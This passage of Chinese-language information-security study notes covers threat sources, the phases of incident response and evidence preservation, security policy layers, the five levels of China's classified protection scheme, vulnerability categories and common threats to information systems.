设备未得到良好配置。如路由器、交换机或服务器使用带有漏洞的默认配置方式，或路由器的路由表未经过良好的维护，服务器的访问控制列表存在漏洞等。 ③政策漏洞。政策制定中未经过良好的协调和协商，存在不可能执行的政策，或政策本身违反法律条文或已有规章制度。
④人员因素。是造成安全威胁的最主要因素。通常，人员因素导致的安全威胁分为恶意攻击者导致的安全威胁和无恶意的人员导致的安全威胁。
典型的恶意攻击者造成的安全威胁是：
A、道德品质低下。攻击者实施以诈骗、盗窃或报复为目的攻击，尤其以报复为目的攻击对组织来说最为危险。
B、伪装或欺骗。其核心在于通过伪装和欺骗来获取攻击者所需要的信息。
C、拒绝服务攻击。攻击者的目的是为了干扰正常的组织运作，借此达到攻击的目的。
典型的无恶意的人员者造成的安全威胁是：
A、突发事故。突发事故可能导致设备损坏或线路故障等。
B、缺少安全意识。组织成员缺乏必要的安全意识，不曾接受过必要的安全培训。
C、工作负担不合理。参与安全工作的工作人员与工作量不能较好匹配，协同工作能力低下或者工作流程分配不合理，可能造成设备的配置错误，也可能出现工作人员相互推卸责任。
2、论述系统突发事件响应策略的主要内容和实现方式。
是提前设计好的，并需要对所有可能突发事件情况进行推测和预测制定的行动方案。一般覆盖事件发生的几个阶段。包括：准备阶段、识别事件、检测和调查、限制、修复和消除、后续步骤。
（1）准备阶段
员工提前接受对应对突发事件的培训，以理解在突发事件发生后的报告链或命令链，并能够按照预定方案进行行动。另外，购置应对处置突发事件时所使用的必要设备（如检测、限制和恢复工具等）。具体准备工作有：
成立突发事件响应工作专家小组，可以是临时的，也可以是常设的。一般由领导、网络系统安全分析人员、（临时或永久的）法律专家组成。进行紧急决策、事件技术分析、指导取证及保留和诉讼、及时准确的信息发布公开等工作的展开。
（2）识别事件
是进行安全事件响应流程的起点和第一步骤。如出现对网络的嗅探或端口扫描，可能是发动一次大规模攻击的前兆，如果在此阶段就能准确识别事件，就可以采取一定的措施避免攻击的进一步扩大。但是，安全人员在没有确定一个安全事件发生之前，就贸然地进入处理安全事件的紧急状态，也是一个非常糟糕的决定。因为一次普通的ping操作或一个简单的http连接都有可能造成误报。而IDS虽可以检测一些事件的发生，但可能这些事件不一定是安全事件或潜在的攻
击威胁。只能进行初步的筛选，还须进一步手工检查和识别。所以，参与识别的人员应该包括系统管理员和网络管理员，如果识别确实是一个攻击或安全事件，及时提高警戒级别，报告相关高层人员，按照预定处置方案进行处理，包括招集事件响应小组，分配相关资源等行动。
（3）调查与检测
是进行安全事件响应流程的起点和第一步骤。其主要任务是对事件中涉及的日志、文件、记录及其相关资料和数据进行研究和分析，从而最终确定事件发生的原因和事件的影响范围。调查的结果最终能够判定安全事件到底是一次攻击还是一次更大规模攻击的前夕；是一次随机事件还是一次误报；安全事件发生的原因和诱因何在？对引发事件的原因进行分类，并判定该次安全事件对整个网络造成的影响进行评估，为下一步的修复提供参考。故准确地发现安全事件的原因，对修复和预防具有重要的作用。
如：在诸多引发安全事件的原因中，病毒和恶意代码通常是最为普遍的，一般用户做不到像安全人员那样敏感，无意中引发病毒或安装木马程序。一般可以采取借助软件包分析工具或反病毒软件来识别病毒，查杀之。
（4）限制、修复和消除
①限制事件的影响和发展：限制安全事件的进一步发展和造成的负面影响。常采取以下的限制活动：
A、通知并警告攻击者。对于内部攻击或已知来源于外部的攻击，可直接对攻击者发出警告，并同时切断他与网络的连接。如需进一步对其进行起诉，应征询法律顾问的意见后，并在收集证据中使用经过取证培训的人员
B、切断攻击者与网络系统的通信：是最为普通的做法，也是最快捷的响应方式。例如：通过添加或修改防火墙的过滤规则，对路由或IDS增加规则，停用特定的软件或硬件组件。若攻击者是通过特定的账户获得非授权访问时，则通过禁用或删除这个账户的方法进行限制。
C、对事件来源进行分析：通过分析事件，找出当前系统中存在的不足之处，并通过必要的手段暂堵住这一漏洞。例如：入侵者是通过软件系统的漏洞进入系统的，则通过给软件系统加装补丁的方式将其限制。
另外，当安全管理员恢复系统和进行漏洞补丁时，往往需要暂切断与网络（或INTERNET互联）的连接，这时用户不能获得网络服务，将导致正常工作或经济
和信誉上的重大损失，此时，需要在保障安全与经济利益之间做出选择。
②修复系统：指恢复机构和组织在攻击之前的正常处理方案。它包括重新设置权限并填补漏洞；逐步恢复服务。严重时，启动灾难恢复计划（DRP），调取异地备份资料等。DRP是安全流程中的一个重要组成部分。
③消除事件的影响：消除攻击事件或攻击者给网络系统造成的影响。主要包括：
A、统一的补丁或升级：对补丁进行测试，确定无误后，才能对系统进行大规模、大批量的打补丁操作，对软件或硬件进行统一的升级或补丁。
B、清查用户账户和文件资源：若攻击者采用的是超越权限或漏洞用户等方式，则清理相关账户，对攻击发生后的建立的用户账户进行详细的检查。若攻击事件是病毒或恶意代码引起的，一般应检查关键文件的健康状况，防止有计算机病毒或木马程序潜伏。禁用一些不必要的账户。
C、检查物理设备：如果攻击者采用物理方式或社会工程学方式进行攻击，须彻底检查物理设备。如果发现有遭受损坏、破坏的，应及时修复或处理，并作出相应的措施防止再次发生。
④后续阶段。由多项任务组成。包括：
A、记录和报告。在在整个事件响应过程中，都应进行详细记录。包括辨识事件、调查事件、响应步骤、修复系统、改进意见等一系列步骤。它对今后应对类似攻击时，将是非常宝贵的资料。如果需要借助法律程序，则还须提供额外的、符合法律规范的报告文档。另外，这些收集的资料，除了提交给高层管理者外，同时可提供给其他组织成员进行警示和提醒，必要时可充时到相关的安全培训教材中。这是某种意义上知识共享的重要组成部分。
B、过程调整（即流程调整）。它包括：
当前的相关政策是否对本次发生的安全事件的解决的帮助？政策起到何种支持作用；
在本次事件的处理中，学习到哪些新的经验与教训；
若再次发生类似事件，今后应如何应对？效果又会有何区别。
⑤取证和保存证据。事件发生后，采取获取和保存具法律效力的证据或事实证明的一系列行为。一般在事件发生后，希望提起诉讼、追查攻击者以至于获得赔偿所必须的手段。
计算机证据具有与其它证据不具有的特点。即往往不能被直接感受到；通常
是书面的证据。所以，获取证据时需要格外注意以下几点：
A、发生攻击后，应在第一时间保护计算机的软件、硬件环境。如立即进行当前系统快照、切断网络和远程连接、记录电子邮件、Web和DNS的当前cache等。若技术能力有限，可聘请或咨询专业的取证技术人员进行证据的保存工作。
B、收集证据时必须进行适当的标记，如标记发现者、被发现日期、时间、地点等信息。
C、保护证据还会受到过冷、过热、潮湿、静电、电磁和震动的影响。若暂时不需要运输和传送的，应保存在物理访问受限制和进行物理访问受控制的环境中。
D、分析调查时，尽量采用原始证据的副本（如磁盘镜像、系统快照等），不要使用原始证据设备。但镜像制作时，应采用按位复制或按扇区复制等较为低级的复制方法，并制作散列摘要。同时，保持证据的连续性（（取证链完整）。如一系列的人和事物能够证明获得的证据，在什么时间、什么地点、存储在何处、谁控制的拥有证据等。因为，一旦不能保证证据的连续性，该证据可能将不被法律机构认同或接受。

1. 简述安全策略体系所包含的内容。
   答：一个合理的信息安全策略体系可以包括三个不同层次的策略文档：
   （1）总体安全策略，阐述了指导性的战略纲领性文件，阐明了企业对于信息安全的看法和立场、信息安全的目标和战略、信息安全所涉及的范围、管理组织构架和责任认定以及对于信息资产的管理办法等内容；
   （2）针对特定问题的具体策略，阐述了企业对于特定安全问题的声明、立场、使用办法、强制要求、角色、责任认定等内容，例如，针对Internet访问操作、计算机和网络病毒
   防治、口令的使用和管理等特定问题，制定有针对性的安全策略；
   （3）针对特定系统的具体策略，更为具体和细化，阐明了特定系统与信息安全有关的使用和维护规则等内容，如防火墙配置策略、电子邮件安全策略等。
2. 简述我国信息安全等级保护的级别划分。
   答： (1)第一级为自我保护级。其主要对象为一般的信息系统，其业务信息安全性或业务服务保证性受到破坏后，会对公民、法人和其它组织的合法权益产生损害，但不损害国家安全、社会秩序和公共利益；本级系统依照国家管理规范和技术标准进行自主保护。
   (2)第二级为指导保护级。其主要对象为一般的信息系统，其业务信息安全性或业务服务保证性受到破坏后，会对社会秩序和公共利益造成轻微损害，但不损害国家安全；本级系统依照国家管理规范和技术标准进行自主保护，必要时，信息安全监管职能部门对其进行指导。
   (3)第三级为监管保护级。其主要对象为涉及国家安全、社会秩序和公共利益的主要信息系统，器业务信息安全性或业务服务保证性受到破坏后，会对国家安全、社会秩序和公共利益造成较大损害；本机系统依照国家管理规范和技术标准进行自主保护，信息安全监管职能部门对其进行监督、检查。
   (4)第四级为强制保护级。其主要对象为涉及国家安全、社会秩序和公共利益的主要信息系统，其业务信息安全性或业务服务保证性受到破坏后，会对国家安全、社会秩序和公共利益造成严重损害；本级系统依照国家管理规范和技术标准进行自主保护，信息安全监管职能部门对其进行强制监督、检查。
   (5)第五级为专控保护级。其主要对象为涉及国家安全、社会秩序和公共利益的重要信息系统的核心子系统，其业务信息安全性或业务服务保证性受到破坏后，会对国家安全社会秩序和公共利益造成特别严重损害；本级系统依照国家管理规范和技术标准进行自主保护，国家指定专门部门、专门机构进行专门监督、检查。
3. 简述信息安全脆弱性的分类及其内容。
   答：信息安全脆弱性的分类及其内容如下所示；
   脆弱性分类：
   一、技术脆弱性
   1、物理安全：物理设备的访问控制、电力供应等
   2、网络安全：基础网络构架、网络传输加密、访问控制、网络设备安全漏洞、设备配置安全等
   3、系统安全：应用软件安全漏洞、软件安全功能、数据防护等
   4、应用安全：应用软件安全漏洞、软件安全功能、数据防护等
   二、管理脆弱性
   安全管理：安全策略、组织安全、资产分类与控制、人员安全、物理与环境安全、通信与操作管理、访问控制、系统开发与维护、业务连续性、符合性
4. 简述至少4种信息系统所面临的安全威胁。
   答：信息系统所面临的常见安全威胁如下所示：
   软硬件故障：由于设备硬件故障、通信链接中断、信息系统或软件Bug导致对业务、高效稳定运行的影响。
   物理环境威胁：断电、静电、灰尘、潮湿、温度、鼠蚁虫害、电磁干扰、洪灾、火灾、地震等环境条件和自然灾害。
   无作为或操作失误：由于应该执行而没有执行相应的操作，或无意的执行了错误的操作，对系统造成影响。
   管理不到位：安全管理无法落实，不到位，造成安全管理不规范，或者管理混乱，从而破坏信息系统正常有序运行。
   恶意代码和病毒：具有自我复制、自我传播能力，对信息系统构成破坏的程序代码。 越权或滥用：通过采用一些，超越自己的权限访问了本来无权访问的资源；或者滥用自己的职权，做出破坏信息系统的行为。
   黑客攻击技术：利用黑客工具和技术，例如，侦察、密码猜测攻击、缓冲区溢出攻击、安装后门、嗅探、伪造和欺骗、拒绝服务攻击等手段对信息系统进行攻击和入侵。
   物理攻击：物理接触、物理破坏、盗窃。
   泄密：机密信息泄露给他人。
   篡改：非法修改信息，破坏信息的完整性。
   抵赖：不承认收到的信息和所作的操作和交易。